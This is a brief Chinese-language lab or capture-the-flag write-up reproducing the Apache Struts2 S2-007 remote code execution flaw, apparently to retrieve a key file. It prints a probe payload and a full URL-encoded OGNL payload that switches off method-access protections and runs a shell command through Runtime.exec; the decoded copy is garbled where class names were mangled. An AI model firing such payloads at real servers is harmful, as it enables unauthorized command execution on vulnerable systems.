0x21.Apache Struts2远程代码执行漏洞(S2-007)复现

s2-007：当配置了验证规则，类型转换出错时，进行了错误的字符串拼接，进而造成了OGNL语句的执行；
抓包，在age值处输入poc；
poc：'+(#application)+'

判断出在age输入框存在s2-007漏洞；
输入poc查找key文件位置，得到key值；
poc：%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ls%20/%27%29.getInputStream%28%29%29%29+%2B+%27

'+(#_memberAccess["allowStaticMethodAccess"]=true,

#foo=new+java.lang.Boolean("false")+,

#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,

@[email protected](@[email protected]().exec('ls').getInputStream()))+'

漏洞详情：

https://xz.aliyun.com/t/2684